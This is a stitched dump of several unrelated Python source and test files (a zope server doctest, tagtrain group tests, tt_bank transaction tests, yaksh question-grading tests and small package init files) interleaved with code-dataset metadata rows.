... def create(self, name, task_dispatcher, db, port='unknown',
... verbose='unspecified', ip=''):
... if not ip:
... ip = '*' # listen on all interfaces
... return ('%s server on %s:%d, registered with %s,\n'
... 'serving from %s, verbosity %s'
... % (name, ip, port, task_dispatcher, db, verbose))
>>> provideUtility(MyServerType(), IServerType, name='HTTP')
>>> provideUtility(MyServerType(), IServerType, name='FTP')
ServerFactory is used to hook into ZConfig and create instances of servers
specified in zope.conf. It gets a `section` argument that contains
settings specified in a ZConfig <server> section.
>>> class ServerSectionStub:
... type = 'HTTP'
... address = ('', 8080)
... verbose = False
>>> my_section = ServerSectionStub()
>>> from zope.app.server.server import ServerFactory
>>> sf = ServerFactory(my_section)
The server factory object knows how to create a server, given a task
dispatcher (see IDispatcher from zope.server.interfaces) and a ZODB
database object.
>>> task_dispatcher = 'my task dispatcher'
>>> db = 'my db'
>>> print(sf.create(task_dispatcher, db))
HTTP server on *:8080, registered with my task dispatcher,
serving from my db, verbosity False
The settings actually work
>>> my_section.type = 'FTP'
>>> my_section.address = ('127.0.0.1', 8021)
>>> my_section.verbose = True
>>> sf = ServerFactory(my_section)
>>> print(sf.create(task_dispatcher, db))
FTP server on 127.0.0.1:8021, registered with my task dispatcher,
serving from my db, verbosity True
That's it.
>>> setup.placelessTearDown()
"""
def test_suite():
return doctest.DocTestSuite()
| 36.767442
| 78
| 0.599937
| 355
| 3,162
| 5.307042
| 0.416901
| 0.066879
| 0.042463
| 0.02017
| 0.125265
| 0.08811
| 0.057325
| 0.057325
| 0.057325
| 0.057325
| 0
| 0.014755
| 0.249842
| 3,162
| 85
| 79
| 37.2
| 0.779511
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0.428571
| 0.142857
| 0.857143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
fb6e554f9fc2e86c5ad2e4a88425f3bedd735ca9
| 74
|
py
|
Python
|
credentialdigger/models/__init__.py
|
Soontao/credential-digger
|
365eedca3eaec201503441046ba0c37937db69e1
|
[
"Apache-2.0"
] | null | null | null |
credentialdigger/models/__init__.py
|
Soontao/credential-digger
|
365eedca3eaec201503441046ba0c37937db69e1
|
[
"Apache-2.0"
] | null | null | null |
credentialdigger/models/__init__.py
|
Soontao/credential-digger
|
365eedca3eaec201503441046ba0c37937db69e1
|
[
"Apache-2.0"
] | null | null | null |
from .path_model import PathModel
from .snippet_model import SnippetModel
| 24.666667
| 39
| 0.864865
| 10
| 74
| 6.2
| 0.7
| 0.354839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 74
| 2
| 40
| 37
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fba6df9af45d877682919dc978d0fef6ce817e6b
| 3,414
|
py
|
Python
|
tests/tagtrain/test_add_me.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | null | null | null |
tests/tagtrain/test_add_me.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | 7
|
2020-03-24T17:54:31.000Z
|
2021-09-21T12:34:34.000Z
|
tests/tagtrain/test_add_me.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from unittest.mock import MagicMock, patch
from tagtrain import data
from . import fake
from tagtrain.tagtrain.tt_add_me import AddMe
@patch('tagtrain.data.by_member.add_user_to_group')
@patch('tagtrain.data.by_owner.find_group')
def test_unknown_group(find_group, add_user_to_group):
find_group.side_effect = data.Group.DoesNotExist()
app, reply, message, match = fake.create_all()
AddMe(app).run(reply, message, match)
find_group.assert_called_once_with('OwnerName', 'GroupName')
add_user_to_group.assert_not_called()
reply.append.assert_called_once_with('User `OwnerName` does not have a Group `GroupName`. Skipping.')
@patch('tagtrain.data.by_member.add_user_to_group')
@patch('tagtrain.data.by_owner.find_group')
def test_existing_member(find_group, add_user_to_group):
group = fake.create_group(name='GroupName', member_count=1, locked=None)
find_group.return_value = group
add_user_to_group.return_value = (group, False)
app, reply, message, match = fake.create_all()
AddMe(app).run(reply, message, match)
find_group.assert_called_once_with('OwnerName', 'GroupName')
add_user_to_group.assert_called_once_with('OwnerName', 'GroupName', 'AuthorName', 'PermaLink')
reply.append.assert_called_once_with("You are already a Member of `OwnerName`'s Group `GroupName`. Skipping.")
@patch('tagtrain.data.by_member.add_user_to_group')
@patch('tagtrain.data.by_owner.find_group')
def test_group_locked(find_group, add_user_to_group):
group = fake.create_group(name='GroupName', member_count=1, locked=datetime.utcnow())
find_group.return_value = group
add_user_to_group.return_value = (group, False)
app, reply, message, match = fake.create_all()
AddMe(app).run(reply, message, match)
find_group.assert_called_once_with('OwnerName', 'GroupName')
add_user_to_group.assert_not_called()
reply.append.assert_called_once_with("Group `GroupName` is locked. Only `OwnerName` can add you. Skipping.")
@patch('tagtrain.data.by_member.add_user_to_group')
@patch('tagtrain.data.by_owner.find_group')
def test_good(find_group, add_user_to_group):
group = fake.create_group(name='GroupName', member_count=1, locked=None)
find_group.return_value = group
add_user_to_group.return_value = (group, True)
app, reply, message, match = fake.create_all()
AddMe(app).run(reply, message, match)
find_group.assert_called_once_with('OwnerName', 'GroupName')
add_user_to_group.assert_called_once_with('OwnerName', 'GroupName', 'AuthorName', 'PermaLink')
reply.append.assert_called_once_with("You were added to `OwnerName`'s Group `GroupName`, 1 total Members.")
@patch('tagtrain.data.by_member.add_user_to_group')
@patch('tagtrain.data.by_owner.find_group')
def test_blacklisted(find_group, add_user_to_group):
group = fake.create_group(name='GroupName', member_count=1, locked=None)
find_group.return_value = group
add_user_to_group.side_effect = data.by_member.Blacklisted()
app, reply, message, match = fake.create_all()
AddMe(app).run(reply, message, match)
find_group.assert_called_once_with('OwnerName', 'GroupName')
add_user_to_group.assert_called_once_with('OwnerName', 'GroupName', 'AuthorName', 'PermaLink')
reply.append.assert_called_once_with("You are Blacklisted from adding yourself to Group `GroupName`. Skipping.")
| 40.164706
| 117
| 0.764792
| 495
| 3,414
| 4.945455
| 0.151515
| 0.05719
| 0.069853
| 0.10866
| 0.805964
| 0.805964
| 0.796569
| 0.796569
| 0.796569
| 0.796569
| 0
| 0.001657
| 0.116286
| 3,414
| 84
| 118
| 40.642857
| 0.809745
| 0
| 0
| 0.672414
| 0
| 0
| 0.278266
| 0.108377
| 0
| 0
| 0
| 0
| 0.258621
| 1
| 0.086207
| false
| 0
| 0.086207
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fbc4ed30b9b2f12d4224cde32a4f7f89c2553705
| 134
|
py
|
Python
|
nerf/__init__.py
|
AnimatedRNG/nerf-jax
|
c940bcfbb986623691aff7a4e28bf8273ea70147
|
[
"Apache-2.0"
] | 5
|
2020-10-22T07:27:15.000Z
|
2022-02-25T02:54:39.000Z
|
nerf/__init__.py
|
AnimatedRNG/nerf-jax
|
c940bcfbb986623691aff7a4e28bf8273ea70147
|
[
"Apache-2.0"
] | 11
|
2021-01-27T01:52:38.000Z
|
2021-02-03T06:35:34.000Z
|
nerf/__init__.py
|
AnimatedRNG/nerf-jax
|
c940bcfbb986623691aff7a4e28bf8273ea70147
|
[
"Apache-2.0"
] | 2
|
2020-12-15T14:44:07.000Z
|
2021-01-27T03:39:01.000Z
|
from .nerf_dataset import *
from .nerf_helpers import *
from .train_utils import *
from .models import *
from .volume_render import *
| 22.333333
| 28
| 0.776119
| 19
| 134
| 5.263158
| 0.526316
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149254
| 134
| 5
| 29
| 26.8
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
83dedc660023d9672a127ba94f75f5d3a9210b27
| 198
|
py
|
Python
|
Server/Python/src/dbs/dao/MySQL/DatasetType/Insert.py
|
vkuznet/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 8
|
2015-08-14T04:01:32.000Z
|
2021-06-03T00:56:42.000Z
|
Server/Python/src/dbs/dao/MySQL/DatasetType/Insert.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 162
|
2015-01-07T21:34:47.000Z
|
2021-10-13T09:42:41.000Z
|
Server/Python/src/dbs/dao/MySQL/DatasetType/Insert.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 16
|
2015-01-22T15:27:29.000Z
|
2021-04-28T09:23:28.000Z
|
#!/usr/bin/env python
""" DAO Object for DatasetTypes table """
from dbs.dao.Oracle.DatasetType.Insert import Insert as OraDatasetTypeInsert
class Insert(OraDatasetTypeInsert):
pass
| 22
| 76
| 0.737374
| 23
| 198
| 6.347826
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171717
| 198
| 8
| 77
| 24.75
| 0.890244
| 0.277778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
83e0f43b931ea28afa3726093155837d3abd708d
| 11,324
|
py
|
Python
|
src/tt_bank/tt_bank/tests/test_handlers.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | 1
|
2020-04-02T11:51:20.000Z
|
2020-04-02T11:51:20.000Z
|
src/tt_bank/tt_bank/tests/test_handlers.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | null | null | null |
src/tt_bank/tt_bank/tests/test_handlers.py
|
devapromix/the-tale
|
2a10efd3270734f8cf482b4cfbc5353ef8f0494c
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
from aiohttp import test_utils
from tt_protocol.protocol import bank_pb2
from tt_web import postgresql as db
from .. import relations
from . import helpers
TEST_OPERATIONS = [bank_pb2.Operation(account_id=666, currency=1, amount=-1000, type='x.1', description='y.1'),
bank_pb2.Operation(account_id=667, currency=1, amount=300, type='x.2', description='y.2'),
bank_pb2.Operation(account_id=666, currency=1, amount=500, type='x.3', description='y.3'),
bank_pb2.Operation(account_id=667, currency=1, amount=-100, type='x.4', description='y.4')]
async def load_operations():
results = await db.sql('SELECT * FROM operations ORDER BY created_at ASC')
return [bank_pb2.Operation(account_id=row['account'],
currency=row['currency'],
amount=row['amount'],
type=row['type'],
description=row['description']) for row in results]
class Base(helpers.BaseTests):
async def check_balance(self, account_id, expected_balance):
request = await self.client.post('/accounts/balance', data=bank_pb2.AccountBalanceRequest(account_id=account_id).SerializeToString())
answer = await self.check_success(request, bank_pb2.AccountBalanceResponse)
self.assertEqual(answer.balance, expected_balance)
class AccountBalanceTests(Base):
@test_utils.unittest_run_loop
async def test_no_balance(self):
await self.check_balance(account_id=666, expected_balance={})
@test_utils.unittest_run_loop
async def test_has_record(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=101)
await self.check_balance(account_id=666, expected_balance={1: 101})
@test_utils.unittest_run_loop
async def test_multiple_currencies(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=101)
await helpers.call_change_balance(account_id=666, currency=2, amount=13)
await self.check_balance(account_id=666, expected_balance={1: 101, 2: 13})
class AccountHistoryTests(Base):
@test_utils.unittest_run_loop
async def test_no_history(self):
request = await self.client.post('/accounts/history', data=bank_pb2.AccountHistoryRequest(account_id=666).SerializeToString())
answer = await self.check_success(request, bank_pb2.AccountHistoryResponse)
self.assertEqual(list(answer.history), [])
async def apply_operations(self, test_operations):
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=test_operations,
lifetime=0).SerializeToString())
answer = await self.check_success(request, bank_pb2.StartTransactionResponse)
await self.client.post('/transactions/commit', data=bank_pb2.CommitTransactionRequest(transaction_id=answer.transaction_id).SerializeToString())
@test_utils.unittest_run_loop
async def test_has_records(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=1000)
await self.apply_operations([bank_pb2.Operation(account_id=666, currency=1, amount=1000, type='x.1', description='y.1'),
bank_pb2.Operation(account_id=666, currency=1, amount=-300, type='x.2', description='y.2')])
await self.apply_operations([bank_pb2.Operation(account_id=667, currency=1, amount=50, type='x.3', description='y.3'),
bank_pb2.Operation(account_id=666, currency=1, amount=-1, type='x.4', description='y.4')])
request = await self.client.post('/accounts/history', data=bank_pb2.AccountHistoryRequest(account_id=666).SerializeToString())
answer = await self.check_success(request, bank_pb2.AccountHistoryResponse)
self.assertEqual([(record.amount, record.description) for record in answer.history],
[(1000, 'y.1'),
(-300, 'y.2'),
(-1, 'y.4')])
@test_utils.unittest_run_loop
async def test_multiple_currencies(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=1000)
await self.apply_operations([bank_pb2.Operation(account_id=666, currency=1, amount=1000, type='x.1', description='y.1'),
bank_pb2.Operation(account_id=666, currency=1, amount=-300, type='x.2', description='y.2')])
await self.apply_operations([bank_pb2.Operation(account_id=667, currency=1, amount=50, type='x.3', description='y.3'),
bank_pb2.Operation(account_id=666, currency=2, amount=1, type='x.4', description='y.4')])
request = await self.client.post('/accounts/history', data=bank_pb2.AccountHistoryRequest(account_id=666).SerializeToString())
answer = await self.check_success(request, bank_pb2.AccountHistoryResponse)
self.assertEqual([(record.currency, record.amount, record.description) for record in answer.history],
[(1, 1000, 'y.1'),
(1, -300, 'y.2'),
(2, 1, 'y.4')])
class StartTransactionTests(Base):
@test_utils.unittest_run_loop
async def test_no_operations(self):
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=[],
lifetime=0).SerializeToString())
await self.check_error(request, error='bank.start_transaction.no_operations_specified')
@test_utils.unittest_run_loop
async def test_started(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=1000)
await helpers.call_change_balance(account_id=667, currency=1, amount=1000)
lifetime = datetime.timedelta(seconds=100)
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=TEST_OPERATIONS,
lifetime=100).SerializeToString())
answer = await self.check_success(request, bank_pb2.StartTransactionResponse)
results = await db.sql('SELECT * FROM transactions WHERE id=%(id)s', {'id': answer.transaction_id})
self.assertEqual(results[0]['state'], relations.TRANSACTION_STATE.OPENED.value)
self.assertEqual(results[0]['lifetime'], lifetime)
results = await db.sql('SELECT transaction FROM operations')
loaded_operations = await load_operations()
self.assertEqual(TEST_OPERATIONS, loaded_operations)
# only withdraws applied on transaction start
await self.check_balance(account_id=666, expected_balance={1: 0})
await self.check_balance(account_id=667, expected_balance={1: 900})
@test_utils.unittest_run_loop
async def test_small_balance(self):
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=TEST_OPERATIONS,
lifetime=0).SerializeToString())
await self.check_error(request, error='bank.start_transaction.no_enough_currency')
results = await db.sql('SELECT * FROM transactions')
self.assertEqual(results, [])
results = await db.sql('SELECT * FROM operations ORDER BY created_at ASC')
self.assertEqual(results, [])
await self.check_balance(account_id=666, expected_balance={})
await self.check_balance(account_id=667, expected_balance={})
class RollbackTransactionTests(Base):
@test_utils.unittest_run_loop
async def test_rollback(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=1000)
await helpers.call_change_balance(account_id=667, currency=1, amount=1000)
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=TEST_OPERATIONS,
lifetime=100).SerializeToString())
answer = await self.check_success(request, bank_pb2.StartTransactionResponse)
request = await self.client.post('/transactions/rollback', data=bank_pb2.RollbackTransactionRequest(transaction_id=answer.transaction_id).SerializeToString())
answer = await self.check_success(request, bank_pb2.StartTransactionResponse)
results = await db.sql('SELECT * FROM transactions')
self.assertEqual(results[0]['state'], relations.TRANSACTION_STATE.ROLLBACKED.value)
results = await db.sql('SELECT * FROM operations ORDER BY created_at ASC')
self.assertEqual(results, [])
await self.check_balance(account_id=666, expected_balance={1: 1000})
await self.check_balance(account_id=667, expected_balance={1: 1000})
@test_utils.unittest_run_loop
async def test_no_transaction_to_rollback(self):
request = await self.client.post('/transactions/rollback', data=bank_pb2.RollbackTransactionRequest(transaction_id=666).SerializeToString())
await self.check_error(request, error='bank.rollback_transaction.no_transacton_to_rollback')
class CommitTransactionTests(Base):
@test_utils.unittest_run_loop
async def test_commit(self):
await helpers.call_change_balance(account_id=666, currency=1, amount=1000)
await helpers.call_change_balance(account_id=667, currency=1, amount=1000)
lifetime = datetime.timedelta(seconds=100)
request = await self.client.post('/transactions/start', data=bank_pb2.StartTransactionRequest(operations=TEST_OPERATIONS,
lifetime=100).SerializeToString())
answer = await self.check_success(request, bank_pb2.StartTransactionResponse)
request = await self.client.post('/transactions/commit', data=bank_pb2.CommitTransactionRequest(transaction_id=answer.transaction_id).SerializeToString())
answer = await self.check_success(request, bank_pb2.CommitTransactionResponse)
results = await db.sql('SELECT * FROM transactions')
self.assertEqual(results[0]['state'], relations.TRANSACTION_STATE.COMMITED.value)
self.assertEqual(results[0]['lifetime'], lifetime)
loaded_operations = await load_operations()
self.assertEqual(TEST_OPERATIONS, loaded_operations)
# only withdraws applied on transaction start
await self.check_balance(account_id=666, expected_balance={1: 500})
await self.check_balance(account_id=667, expected_balance={1: 1200})
@test_utils.unittest_run_loop
async def test_no_transaction_to_commit(self):
request = await self.client.post('/transactions/commit', data=bank_pb2.CommitTransactionRequest(transaction_id=666).SerializeToString())
await self.check_error(request, error='bank.commit_transaction.no_transacton_to_commit')
| 51.472727
| 166
| 0.672466
| 1,305
| 11,324
| 5.636015
| 0.098851
| 0.053841
| 0.04242
| 0.043508
| 0.860503
| 0.853977
| 0.845139
| 0.832087
| 0.815092
| 0.752141
| 0
| 0.040784
| 0.220505
| 11,324
| 219
| 167
| 51.707763
| 0.792455
| 0.007683
| 0
| 0.482993
| 0
| 0
| 0.082606
| 0.020385
| 0
| 0
| 0
| 0
| 0.095238
| 1
| 0
| false
| 0
| 0.040816
| 0
| 0.088435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f7a6cf662c87426100707d316c14ec5fadcf050d
| 33,140
|
py
|
Python
|
yaksh/evaluator_tests/test_simple_question_types.py
|
tyochans/online_test
|
4eb754c2e71922819de7390d1b4993a21763de3e
|
[
"Python-2.0"
] | 1
|
2022-03-21T11:14:17.000Z
|
2022-03-21T11:14:17.000Z
|
yaksh/evaluator_tests/test_simple_question_types.py
|
tyochans/online_test
|
4eb754c2e71922819de7390d1b4993a21763de3e
|
[
"Python-2.0"
] | null | null | null |
yaksh/evaluator_tests/test_simple_question_types.py
|
tyochans/online_test
|
4eb754c2e71922819de7390d1b4993a21763de3e
|
[
"Python-2.0"
] | null | null | null |
import unittest
from datetime import datetime, timedelta
from django.utils import timezone
from textwrap import dedent
import pytz
from yaksh.models import User, Profile, Question, Quiz, QuestionPaper,\
AnswerPaper, Answer, Course, IntegerTestCase, FloatTestCase,\
StringTestCase, McqTestCase, ArrangeTestCase
def setUpModule():
# Create user profile
# Create User 1
user = User.objects.create_user(username='demo_user_100',
password='demo',
email='demo@test.com')
Profile.objects.create(user=user, roll_number=1,
institute='IIT', department='Aerospace',
position='Student')
# Create User 2
user2 = User.objects.create_user(
username='demo_user_101', password='demo',
email='demo@test.com')
Profile.objects.create(user=user2, roll_number=2,
institute='IIT', department='Aerospace',
position='Student')
# Create a course
Course.objects.create(name="Python Course 100",
enrollment="Enroll Request", creator=user)
quiz = Quiz.objects.create(
start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
duration=30, active=True, attempts_allowed=1,
time_between_attempts=0, pass_criteria=0,
description='demo quiz 100',
instructions="Demo Instructions",
creator=user
)
QuestionPaper.objects.create(quiz=quiz, total_marks=1.0)
def tearDownModule():
User.objects.filter(username__in=["demo_user_100", "demo_user_101"])\
.delete()
class IntegerQuestionTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz)
# Creating User
self.user = User.objects.get(username='demo_user_100')
# Creating Question
self.question1 = Question.objects.create(summary='int1', points=1,
type='code', user=self.user)
self.question1.language = 'python'
self.question1.type = "integer"
self.question1.test_case_type = 'integertestcase'
self.question1.description = 'sum of 12+13?'
self.question1.save()
# Creating answerpaper
self.answerpaper = AnswerPaper.objects.create(
user=self.user, user_ip='101.0.0.1', start_time=timezone.now(),
question_paper=self.question_paper, course=self.course,
end_time=timezone.now()+timedelta(minutes=5), attempt_number=1
)
self.answerpaper.questions.add(self.question1)
self.answerpaper.save()
# For question
self.integer_based_testcase = IntegerTestCase(question=self.question1,
correct=25,
type='integertestcase',
)
self.integer_based_testcase.save()
@classmethod
def tearDownClass(self):
self.question1.delete()
self.answerpaper.delete()
def test_validate_regrade_integer_correct_answer(self):
# Given
integer_answer = 25
self.answer = Answer(question=self.question1,
answer=integer_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
self.answerpaper.save()
# When
json_data = None
result = self.answerpaper.validate_answer(integer_answer,
self.question1,
json_data,
)
# Then
self.assertTrue(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
regrade_answer.answer = 200
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_validate_regrade_integer_incorrect_answer(self):
# Given
integer_answer = 26
self.answer = Answer(question=self.question1,
answer=integer_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(integer_answer,
self.question1, json_data
)
# Then
self.assertFalse(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
regrade_answer.answer = 25
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 1)
self.assertTrue(self.answer.correct)
class StringQuestionTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz)
# Creating User
self.user = User.objects.get(username='demo_user_100')
# Creating Question
self.question1 = Question.objects.create(summary='str1', points=1,
type='code', user=self.user)
self.question1.language = 'python'
self.question1.type = "string"
self.question1.test_case_type = 'stringtestcase'
self.question1.description = 'Write Hello, EARTH!'
self.question1.save()
self.question2 = Question.objects.create(summary='str2', points=1,
type='code', user=self.user)
self.question2.language = 'python'
self.question2.type = "string"
self.question2.test_case_type = 'stringtestcase'
self.question2.description = 'Write Hello, EARTH!'
self.question2.save()
# Creating answerpaper
self.answerpaper = AnswerPaper.objects.create(
user=self.user, user_ip='101.0.0.1', start_time=timezone.now(),
question_paper=self.question_paper, course=self.course,
end_time=timezone.now()+timedelta(minutes=5), attempt_number=1
)
self.answerpaper.questions.add(*[self.question1, self.question2])
self.answerpaper.save()
# For question
self.lower_string_testcase = StringTestCase(question=self.question1,
correct="Hello, EARTH!",
string_check="lower",
type='stringtestcase',
)
self.lower_string_testcase.save()
self.exact_string_testcase = StringTestCase(question=self.question2,
correct="Hello, EARTH!",
string_check="exact",
type='stringtestcase',
)
self.exact_string_testcase.save()
@classmethod
def tearDownClass(self):
self.question1.delete()
self.question2.delete()
self.answerpaper.delete()
def test_validate_regrade_case_insensitive_string_correct_answer(self):
# Given
string_answer = "hello, earth!"
answer = Answer(question=self.question1, answer=string_answer)
answer.save()
self.answerpaper.answers.add(answer)
# When
json_data = None
result = self.answerpaper.validate_answer(string_answer,
self.question1, json_data
)
# Then
self.assertTrue(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=answer.id)
regrade_answer.answer = "hello, mars!"
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
answer = self.answerpaper.answers.filter(
question=self.question1).last()
self.assertEqual(answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(answer.marks, 0)
self.assertFalse(answer.correct)
def test_validate_regrade_case_insensitive_string_incorrect_answer(self):
# Given
string_answer = "hello, mars!"
answer = Answer(question=self.question1, answer=string_answer)
answer.save()
self.answerpaper.answers.add(answer)
# When
json_data = None
result = self.answerpaper.validate_answer(string_answer,
self.question1, json_data
)
# Then
self.assertFalse(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=answer.id)
regrade_answer.answer = "hello, earth!"
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
answer = self.answerpaper.answers.filter(
question=self.question1).last()
self.assertEqual(answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(answer.marks, 1)
self.assertTrue(answer.correct)
def test_validate_regrade_case_sensitive_string_correct_answer(self):
# Given
string_answer = "Hello, EARTH!"
answer = Answer(question=self.question2, answer=string_answer)
answer.save()
self.answerpaper.answers.add(answer)
# When
json_data = None
result = self.answerpaper.validate_answer(string_answer,
self.question2, json_data
)
# Then
self.assertTrue(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=answer.id)
regrade_answer.answer = "hello, earth!"
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question2.id)
# Then
answer = self.answerpaper.answers.filter(
question=self.question2).last()
self.assertEqual(answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(answer.marks, 0)
self.assertFalse(answer.correct)
def test_case_sensitive_string_incorrect_answer(self):
# Given
string_answer = "hello, earth!"
answer = Answer(question=self.question2, answer=string_answer)
answer.save()
self.answerpaper.answers.add(answer)
# When
json_data = None
result = self.answerpaper.validate_answer(string_answer,
self.question2, json_data
)
# Then
self.assertFalse(result['success'])
# Regrade
# Given
regrade_answer = Answer.objects.get(id=answer.id)
regrade_answer.answer = "Hello, EARTH!"
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question2.id)
# Then
answer = self.answerpaper.answers.filter(
question=self.question2).last()
self.assertEqual(answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(answer.marks, 1)
self.assertTrue(answer.correct)
class FloatQuestionTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz)
# Creating User
self.user = User.objects.get(username='demo_user_100')
# Creating Question
self.question1 = Question.objects.create(summary='flt1', points=1,
type='code', user=self.user)
self.question1.language = 'python'
self.question1.type = "float"
self.question1.test_case_type = 'floattestcase'
self.question1.save()
# Creating answerpaper
self.answerpaper = AnswerPaper.objects.create(
user=self.user, user_ip='101.0.0.1', start_time=timezone.now(),
question_paper=self.question_paper, course=self.course,
end_time=timezone.now()+timedelta(minutes=5), attempt_number=1,
)
self.answerpaper.questions.add(self.question1)
self.answerpaper.save()
# For question
self.float_based_testcase = FloatTestCase(question=self.question1,
correct=100,
error_margin=0.1,
type='floattestcase',
)
self.float_based_testcase.save()
@classmethod
def tearDownClass(self):
self.question1.delete()
self.answerpaper.delete()
